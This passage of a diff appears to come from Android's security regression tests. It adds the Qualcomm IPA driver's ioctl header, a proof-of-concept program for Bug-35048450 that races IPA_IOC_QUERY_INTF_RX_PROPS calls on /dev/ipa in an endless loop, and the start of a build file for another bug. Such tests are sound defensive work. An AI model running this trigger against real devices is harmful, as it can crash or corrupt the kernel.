+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_rt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl_indx - routing table index lookup parameters
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @index: output parameter, routing table index, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl_indx {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t idx;
+};
+
+/**
+ * struct ipa_flt_rule_add - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @at_rear: add at back of filtering table?
+ * @flt_rule_hdl: out parameter, handle to rule, valid when status is 0
+ * @status: output parameter, status of filtering rule add operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_add {
+ struct ipa_flt_rule rule;
+ uint8_t at_rear;
+ uint32_t flt_rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule - filtering rule addition parameters (supports
+ * multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * valid only when global is 0
+ * @global: does this apply to global filter table of specific IP family
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_add_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t global;
+ uint8_t num_rules;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_ioc_add_flt_rule_after - filtering rule addition after specific
+ * rule parameters (supports multiple rules and commit)
+ * all rules MUST be added to same table
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @ep: which "clients" pipe does this rule apply to?
+ * @num_rules: number of filtering rules that follow
+ * @add_after_hdl: rules will be added after the rule with this handle
+ * @rules: all rules need to go back to back here, no pointers. at rear field
+ * is ignored when using this IOCTL
+ */
+struct ipa_ioc_add_flt_rule_after {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ enum ipa_client_type ep;
+ uint8_t num_rules;
+ uint32_t add_after_hdl;
+ struct ipa_flt_rule_add rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_mdfy - filtering rule descriptor includes
+ * in and out parameters
+ * @rule: actual rule to be added
+ * @flt_rule_hdl: handle to rule
+ * @status: output parameter, status of filtering rule modify operation,
+ * 0 for success,
+ * -1 for failure
+ *
+ */
+struct ipa_flt_rule_mdfy {
+ struct ipa_flt_rule rule;
+ uint32_t rule_hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_mdfy_flt_rule - filtering rule modify parameters (supports
+ * multiple rules and commit)
+ * @commit: should rules be written to IPA HW also?
+ * @ip: IP family of rule
+ * @num_rules: number of filtering rules that follow
+ * @rules: all rules need to go back to back here, no pointers
+ */
+struct ipa_ioc_mdfy_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_rules;
+ struct ipa_flt_rule_mdfy rules[0];
+};
+
+/**
+ * struct ipa_flt_rule_del - filtering rule descriptor includes
+ * in and out parameters
+ *
+ * @hdl: handle returned from filtering rule add operation
+ * @status: output parameter, status of filtering rule delete operation,
+ * 0 for success,
+ * -1 for failure
+ */
+struct ipa_flt_rule_del {
+ uint32_t hdl;
+ int status;
+};
+
+/**
+ * struct ipa_ioc_del_flt_rule - filtering rule deletion parameters (supports
+ * multiple headers and commit)
+ * @commit: should rules be removed from IPA HW also?
+ * @ip: IP family of rules
+ * @num_hdls: num of rules being removed
+ * @hdl: all handles need to go back to back here, no pointers
+ */
+struct ipa_ioc_del_flt_rule {
+ uint8_t commit;
+ enum ipa_ip_type ip;
+ uint8_t num_hdls;
+ struct ipa_flt_rule_del hdl[0];
+};
+
+/**
+ * struct ipa_ioc_get_rt_tbl - routing table lookup parameters, if lookup was
+ * successful caller must call put to release the reference
+ * count when done
+ * @ip: IP family of table
+ * @name: name of routing table resource
+ * @htl: output parameter, handle of routing table, valid only when ioctl
+ * return val is non-negative
+ */
+struct ipa_ioc_get_rt_tbl {
+ enum ipa_ip_type ip;
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t hdl;
+};
+
+/**
+ * struct ipa_ioc_query_intf - used to lookup number of tx and
+ * rx properties of interface
+ * @name: name of interface
+ * @num_tx_props: output parameter, number of tx properties
+ * valid only when ioctl return val is non-negative
+ * @num_rx_props: output parameter, number of rx properties
+ * valid only when ioctl return val is non-negative
+ * @num_ext_props: output parameter, number of ext properties
+ * valid only when ioctl return val is non-negative
+ * @excp_pipe: exception packets of this interface should be
+ * routed to this pipe
+ */
+struct ipa_ioc_query_intf {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ uint32_t num_rx_props;
+ uint32_t num_ext_props;
+ enum ipa_client_type excp_pipe;
+};
+
+/**
+ * struct ipa_ioc_tx_intf_prop - interface tx property
+ * @ip: IP family of routing rule
+ * @attrib: routing rule
+ * @dst_pipe: routing output pipe
+ * @alt_dst_pipe: alternate routing output pipe
+ * @hdr_name: name of associated header if any, empty string when no header
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_tx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type dst_pipe;
+ enum ipa_client_type alt_dst_pipe;
+ char hdr_name[IPA_RESOURCE_NAME_MAX];
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_tx_props - interface tx propertie
+ * @name: name of interface
+ * @num_tx_props: number of TX properties
+ * @tx[0]: output parameter, the tx properties go here back to back
+ */
+struct ipa_ioc_query_intf_tx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[0];
+};
+
+/**
+ * struct ipa_ioc_ext_intf_prop - interface extended property
+ * @ip: IP family of routing rule
+ * @eq_attrib: attributes of the rule in equation form
+ * @action: action field
+ * @rt_tbl_idx: index of RT table referred to by filter rule
+ * @mux_id: MUX_ID
+ * @filter_hdl: handle of filter (as specified by provider of filter rule)
+ * @is_xlat_rule: it is xlat flt rule or not
+ */
+struct ipa_ioc_ext_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+ enum ipa_flt_action action;
+ uint32_t rt_tbl_idx;
+ uint8_t mux_id;
+ uint32_t filter_hdl;
+ uint8_t is_xlat_rule;
+ uint32_t rule_id;
+ uint8_t is_rule_hashable;
+};
+
+/**
+ * struct ipa_ioc_query_intf_ext_props - interface ext propertie
+ * @name: name of interface
+ * @num_ext_props: number of EXT properties
+ * @ext[0]: output parameter, the ext properties go here back to back
+ */
+struct ipa_ioc_query_intf_ext_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_ext_props;
+ struct ipa_ioc_ext_intf_prop ext[0];
+};
+
+/**
+ * struct ipa_ioc_rx_intf_prop - interface rx property
+ * @ip: IP family of filtering rule
+ * @attrib: filtering rule
+ * @src_pipe: input pipe
+ * @hdr_l2_type: type of associated header if any, use NONE when no header
+ */
+struct ipa_ioc_rx_intf_prop {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ enum ipa_client_type src_pipe;
+ enum ipa_hdr_l2_type hdr_l2_type;
+};
+
+/**
+ * struct ipa_ioc_query_intf_rx_props - interface rx propertie
+ * @name: name of interface
+ * @num_rx_props: number of RX properties
+ * @rx: output parameter, the rx properties go here back to back
+ */
+struct ipa_ioc_query_intf_rx_props {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[0];
+};
+
+/**
+ * struct ipa_ioc_nat_alloc_mem - nat table memory allocation
+ * properties
+ * @dev_name: input parameter, the name of table
+ * @size: input parameter, size of table in bytes
+ * @offset: output parameter, offset into page in case of system memory
+ */
+struct ipa_ioc_nat_alloc_mem {
+ char dev_name[IPA_RESOURCE_NAME_MAX];
+ size_t size;
+ off_t offset;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_init - nat table initialization
+ * parameters
+ * @tbl_index: input parameter, index of the table
+ * @ipv4_rules_offset: input parameter, ipv4 rules address offset
+ * @expn_rules_offset: input parameter, ipv4 expansion rules address offset
+ * @index_offset: input parameter, index rules offset
+ * @index_expn_offset: input parameter, index expansion rules offset
+ * @table_entries: input parameter, ipv4 rules table size in entries
+ * @expn_table_entries: input parameter, ipv4 expansion rules table size
+ * @ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_init {
+ uint8_t tbl_index;
+ uint32_t ipv4_rules_offset;
+ uint32_t expn_rules_offset;
+
+ uint32_t index_offset;
+ uint32_t index_expn_offset;
+
+ uint16_t table_entries;
+ uint16_t expn_table_entries;
+ uint32_t ip_addr;
+};
+
+/**
+ * struct ipa_ioc_v4_nat_del - nat table delete parameter
+ * @table_index: input parameter, index of the table
+ * @public_ip_addr: input parameter, public ip address
+ */
+struct ipa_ioc_v4_nat_del {
+ uint8_t table_index;
+ uint32_t public_ip_addr;
+};
+
+/**
+ * struct ipa_ioc_nat_dma_one - nat dma command parameter
+ * @table_index: input parameter, index of the table
+ * @base_addr: type of table, from which the base address of the table
+ * can be inferred
+ * @offset: destination offset within the NAT table
+ * @data: data to be written.
+ */
+struct ipa_ioc_nat_dma_one {
+ uint8_t table_index;
+ uint8_t base_addr;
+
+ uint32_t offset;
+ uint16_t data;
+
+};
+
+/**
+ * struct ipa_ioc_nat_dma_cmd - To hold multiple nat dma commands
+ * @entries: number of dma commands in use
+ * @dma: data pointer to the dma commands
+ */
+struct ipa_ioc_nat_dma_cmd {
+ uint8_t entries;
+ struct ipa_ioc_nat_dma_one dma[0];
+
+};
+
+/**
+ * struct ipa_msg_meta - Format of the message meta-data.
+ * @msg_type: the type of the message
+ * @rsvd: reserved bits for future use.
+ * @msg_len: the length of the message in bytes
+ *
+ * For push model:
+ * Client in user-space should issue a read on the device (/dev/ipa) with a
+ * sufficiently large buffer in a continuous loop, call will block when there is
+ * no message to read. Upon return, client can read the ipa_msg_meta from start
+ * of buffer to find out type and length of message
+ * size of buffer supplied >= (size of largest message + size of metadata)
+ *
+ * For pull model:
+ * Client in user-space can also issue a pull msg IOCTL to device (/dev/ipa)
+ * with a payload containing space for the ipa_msg_meta and the message specific
+ * payload length.
+ * size of buffer supplied == (len of specific message + size of metadata)
+ */
+struct ipa_msg_meta {
+ uint8_t msg_type;
+ uint8_t rsvd;
+ uint16_t msg_len;
+};
+
+/**
+ * struct ipa_wlan_msg - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @mac_addr: mac address of wlan client
+ *
+ * wlan drivers need to pass name of wlan iface and mac address of
+ * wlan client along with ipa_wlan_event, whenever a wlan client is
+ * connected/disconnected/moved to power save/come out of power save
+ */
+struct ipa_wlan_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+};
+
+/**
+ * enum ipa_wlan_hdr_attrib_type - attribute type
+ * in wlan client header
+ *
+ * WLAN_HDR_ATTRIB_MAC_ADDR: attrib type mac address
+ * WLAN_HDR_ATTRIB_STA_ID: attrib type station id
+ */
+enum ipa_wlan_hdr_attrib_type {
+ WLAN_HDR_ATTRIB_MAC_ADDR,
+ WLAN_HDR_ATTRIB_STA_ID
+};
+
+/**
+ * struct ipa_wlan_hdr_attrib_val - header attribute value
+ * @attrib_type: type of attribute
+ * @offset: offset of attribute within header
+ * @u.mac_addr: mac address
+ * @u.sta_id: station id
+ */
+struct ipa_wlan_hdr_attrib_val {
+ enum ipa_wlan_hdr_attrib_type attrib_type;
+ uint8_t offset;
+ union {
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+ uint8_t sta_id;
+ } u;
+};
+
+/**
+ * struct ipa_wlan_msg_ex - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @num_of_attribs: number of attributes
+ * @attrib_val: holds attribute values
+ *
+ * wlan drivers need to pass name of wlan iface and mac address
+ * of wlan client or station id along with ipa_wlan_event,
+ * whenever a wlan client is connected/disconnected/moved to
+ * power save/come out of power save
+ */
+struct ipa_wlan_msg_ex {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_of_attribs;
+ struct ipa_wlan_hdr_attrib_val attribs[0];
+};
+
+struct ipa_ecm_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ int ifindex;
+};
+
+/**
+ * struct ipa_wan_msg - To hold information about wan client
+ * @name: name of the wan interface
+ *
+ * CnE need to pass the name of default wan iface when connected/disconnected.
+ * netmgr need to pass the name of wan eMBMS iface when connected.
+ */
+struct ipa_wan_msg {
+ char upstream_ifname[IPA_RESOURCE_NAME_MAX];
+ char tethered_ifname[IPA_RESOURCE_NAME_MAX];
+ enum ipa_ip_type ip;
+};
+
+/**
+ * struct ipa_ioc_rm_dependency - parameters for add/delete dependency
+ * @resource_name: name of dependent resource
+ * @depends_on_name: name of its dependency
+ */
+struct ipa_ioc_rm_dependency {
+ enum ipa_rm_resource_name resource_name;
+ enum ipa_rm_resource_name depends_on_name;
+};
+
+struct ipa_ioc_generate_flt_eq {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+};
+
+/**
+ * struct ipa_ioc_write_qmapid - to write mux id to endpoint meta register
+ * @mux_id: mux id of wan
+ */
+struct ipa_ioc_write_qmapid {
+ enum ipa_client_type client;
+ uint8_t qmap_id;
+};
+
+enum ipacm_client_enum {
+ IPACM_CLIENT_USB = 1,
+ IPACM_CLIENT_WLAN,
+ IPACM_CLIENT_MAX
+};
+/**
+ * actual IOCTLs supported by IPA driver
+ */
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR, \
+ struct ipa_ioc_add_hdr *)
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR, \
+ struct ipa_ioc_del_hdr *)
+#define IPA_IOC_ADD_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE, \
+ struct ipa_ioc_add_rt_rule *)
+#define IPA_IOC_ADD_RT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE_AFTER, \
+ struct ipa_ioc_add_rt_rule_after *)
+#define IPA_IOC_DEL_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_RT_RULE, \
+ struct ipa_ioc_del_rt_rule *)
+#define IPA_IOC_ADD_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE, \
+ struct ipa_ioc_add_flt_rule *)
+#define IPA_IOC_ADD_FLT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE_AFTER, \
+ struct ipa_ioc_add_flt_rule_after *)
+#define IPA_IOC_DEL_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_FLT_RULE, \
+ struct ipa_ioc_del_flt_rule *)
+#define IPA_IOC_COMMIT_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_COMMIT_HDR)
+#define IPA_IOC_RESET_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_RESET_HDR)
+#define IPA_IOC_COMMIT_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_COMMIT_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_DUMP _IO(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DUMP)
+#define IPA_IOC_GET_RT_TBL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_RT_TBL, \
+ struct ipa_ioc_get_rt_tbl *)
+#define IPA_IOC_PUT_RT_TBL _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_RT_TBL, \
+ uint32_t)
+#define IPA_IOC_COPY_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COPY_HDR, \
+ struct ipa_ioc_copy_hdr *)
+#define IPA_IOC_QUERY_INTF _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF, \
+ struct ipa_ioc_query_intf *)
+#define IPA_IOC_QUERY_INTF_TX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_TX_PROPS, \
+ struct ipa_ioc_query_intf_tx_props *)
+#define IPA_IOC_QUERY_INTF_RX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_RX_PROPS, \
+ struct ipa_ioc_query_intf_rx_props *)
+#define IPA_IOC_QUERY_INTF_EXT_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_EXT_PROPS, \
+ struct ipa_ioc_query_intf_ext_props *)
+#define IPA_IOC_GET_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HDR, \
+ struct ipa_ioc_get_hdr *)
+#define IPA_IOC_PUT_HDR _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_HDR, \
+ uint32_t)
+#define IPA_IOC_ALLOC_NAT_MEM _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ALLOC_NAT_MEM, \
+ struct ipa_ioc_nat_alloc_mem *)
+#define IPA_IOC_V4_INIT_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_INIT_NAT, \
+ struct ipa_ioc_v4_nat_init *)
+#define IPA_IOC_NAT_DMA _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NAT_DMA, \
+ struct ipa_ioc_nat_dma_cmd *)
+#define IPA_IOC_V4_DEL_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_DEL_NAT, \
+ struct ipa_ioc_v4_nat_del *)
+#define IPA_IOC_GET_NAT_OFFSET _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_NAT_OFFSET, \
+ uint32_t *)
+#define IPA_IOC_SET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_SET_FLT, \
+ uint32_t)
+#define IPA_IOC_PULL_MSG _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PULL_MSG, \
+ struct ipa_msg_meta *)
+#define IPA_IOC_RM_ADD_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_ADD_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_RM_DEL_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_DEL_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_GENERATE_FLT_EQ _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GENERATE_FLT_EQ, \
+ struct ipa_ioc_generate_flt_eq *)
+#define IPA_IOC_QUERY_EP_MAPPING _IOR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_EP_MAPPING, \
+ uint32_t)
+#define IPA_IOC_QUERY_RT_TBL_INDEX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_RT_TBL_INDEX, \
+ struct ipa_ioc_get_rt_tbl_indx *)
+#define IPA_IOC_WRITE_QMAPID _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_WRITE_QMAPID, \
+ struct ipa_ioc_write_qmapid *)
+#define IPA_IOC_MDFY_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_FLT_RULE, \
+ struct ipa_ioc_mdfy_flt_rule *)
+#define IPA_IOC_MDFY_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_RT_RULE, \
+ struct ipa_ioc_mdfy_rt_rule *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_ADD _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD, \
+ struct ipa_wan_msg *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_DEL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_NOTIFY_WAN_EMBMS_CONNECTED _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_ADD_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR_PROC_CTX, \
+ struct ipa_ioc_add_hdr_proc_ctx *)
+#define IPA_IOC_DEL_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR_PROC_CTX, \
+ struct ipa_ioc_del_hdr_proc_ctx *)
+
+#define IPA_IOC_GET_HW_VERSION _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HW_VERSION, \
+ enum ipa_hw_type *)
+
+/*
+ * unique magic number of the Tethering bridge ioctls
+ */
+#define TETH_BRIDGE_IOC_MAGIC 0xCE
+
+/*
+ * Ioctls supported by Tethering bridge driver
+ */
+#define TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE 0
+#define TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS 1
+#define TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS 2
+#define TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES 3
+#define TETH_BRIDGE_IOCTL_MAX 4
+
+
+/**
+ * enum teth_link_protocol_type - link protocol (IP / Ethernet)
+ */
+enum teth_link_protocol_type {
+ TETH_LINK_PROTOCOL_IP,
+ TETH_LINK_PROTOCOL_ETHERNET,
+ TETH_LINK_PROTOCOL_MAX,
+};
+
+/**
+ * enum teth_aggr_protocol_type - Aggregation protocol (MBIM / TLP)
+ */
+enum teth_aggr_protocol_type {
+ TETH_AGGR_PROTOCOL_NONE,
+ TETH_AGGR_PROTOCOL_MBIM,
+ TETH_AGGR_PROTOCOL_TLP,
+ TETH_AGGR_PROTOCOL_MAX,
+};
+
+/**
+ * struct teth_aggr_params_link - Aggregation parameters for uplink/downlink
+ * @aggr_prot: Aggregation protocol (MBIM / TLP)
+ * @max_transfer_size_byte: Maximal size of aggregated packet in bytes.
+ * Default value is 16*1024.
+ * @max_datagrams: Maximal number of IP packets in an aggregated
+ * packet. Default value is 16
+ */
+struct teth_aggr_params_link {
+ enum teth_aggr_protocol_type aggr_prot;
+ uint32_t max_transfer_size_byte;
+ uint32_t max_datagrams;
+};
+
+
+/**
+ * struct teth_aggr_params - Aggregation parmeters
+ * @ul: Uplink parameters
+ * @dl: Downlink parmaeters
+ */
+struct teth_aggr_params {
+ struct teth_aggr_params_link ul;
+ struct teth_aggr_params_link dl;
+};
+
+/**
+ * struct teth_aggr_capabilities - Aggregation capabilities
+ * @num_protocols: Number of protocols described in the array
+ * @prot_caps[]: Array of aggregation capabilities per protocol
+ */
+struct teth_aggr_capabilities {
+ uint16_t num_protocols;
+ struct teth_aggr_params_link prot_caps[0];
+};
+
+/**
+ * struct teth_ioc_set_bridge_mode
+ * @link_protocol: link protocol (IP / Ethernet)
+ * @lcid: logical channel number
+ */
+struct teth_ioc_set_bridge_mode {
+ enum teth_link_protocol_type link_protocol;
+ uint16_t lcid;
+};
+
+/**
+ * struct teth_ioc_set_aggr_params
+ * @aggr_params: Aggregation parmeters
+ * @lcid: logical channel number
+ */
+struct teth_ioc_aggr_params {
+ struct teth_aggr_params aggr_params;
+ uint16_t lcid;
+};
+
+
+#define TETH_BRIDGE_IOC_SET_BRIDGE_MODE _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE, \
+ struct teth_ioc_set_bridge_mode *)
+#define TETH_BRIDGE_IOC_SET_AGGR_PARAMS _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_PARAMS _IOR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_CAPABILITIES _IOWR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES, \
+ struct teth_aggr_capabilities *)
+
+/*
+ * unique magic number of the ODU bridge ioctls
+ */
+#define ODU_BRIDGE_IOC_MAGIC 0xCD
+
+/*
+ * Ioctls supported by ODU bridge driver
+ */
+#define ODU_BRIDGE_IOCTL_SET_MODE 0
+#define ODU_BRIDGE_IOCTL_SET_LLV6_ADDR 1
+#define ODU_BRIDGE_IOCTL_MAX 2
+
+/**
+ * enum odu_bridge_mode - bridge mode
+ * (ROUTER MODE / BRIDGE MODE)
+ */
+enum odu_bridge_mode {
+ ODU_BRIDGE_MODE_ROUTER,
+ ODU_BRIDGE_MODE_BRIDGE,
+ ODU_BRIDGE_MODE_MAX,
+};
+
+#define ODU_BRIDGE_IOC_SET_MODE _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_MODE, \
+ enum odu_bridge_mode)
+
+#define ODU_BRIDGE_IOC_SET_LLV6_ADDR _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_LLV6_ADDR, \
+ struct in6_addr *)
+
+#endif /* _UAPI_MSM_IPA_H_ */
diff --git a/hostsidetests/security/securityPatch/Bug-35048450/poc.cpp b/hostsidetests/security/securityPatch/Bug-35048450/poc.cpp
new file mode 100644
index 0000000..aa9410f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35048450/poc.cpp
@@ -0,0 +1,64 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+*/
+
+
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include "local_poc.h"
+#include <unistd.h>
+#include <stdio.h>
+
+struct ipa_ioc_query_intf_rx_props_2 {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_rx_props;
+ struct ipa_ioc_rx_intf_prop rx[2];
+};
+int main() {
+
+ int fd = open("/dev/ipa", O_RDWR);
+
+ struct ipa_ioc_query_intf query_intf;
+ strlcpy(&(query_intf.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+
+ int result = ioctl(fd, IPA_IOC_QUERY_INTF, &query_intf);
+
+ ipa_ioc_query_intf_rx_props_2 rx_props_2;
+ memset(&rx_props_2, 0, sizeof(rx_props_2));
+ strlcpy(&(rx_props_2.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ rx_props_2.num_rx_props = 2;
+
+ int result2 = ioctl(fd, IPA_IOC_QUERY_INTF_RX_PROPS, &rx_props_2);
+
+ while (true) {
+ ipa_ioc_query_intf_rx_props rx_props;
+ memset(&rx_props, 0, sizeof(rx_props));
+ strlcpy(&(rx_props.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ rx_props.num_rx_props = 0;
+
+ int result3 = ioctl(fd, IPA_IOC_QUERY_INTF_RX_PROPS, &rx_props);
+
+ usleep(10000);
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-35644815/Android.mk b/hostsidetests/security/securityPatch/Bug-35644815/Android.mk
new file mode 100644
index 0000000..1dd2950
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644815/Android.mk
@@ -0,0 +1,35 @@
+#Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+ include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35644815
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
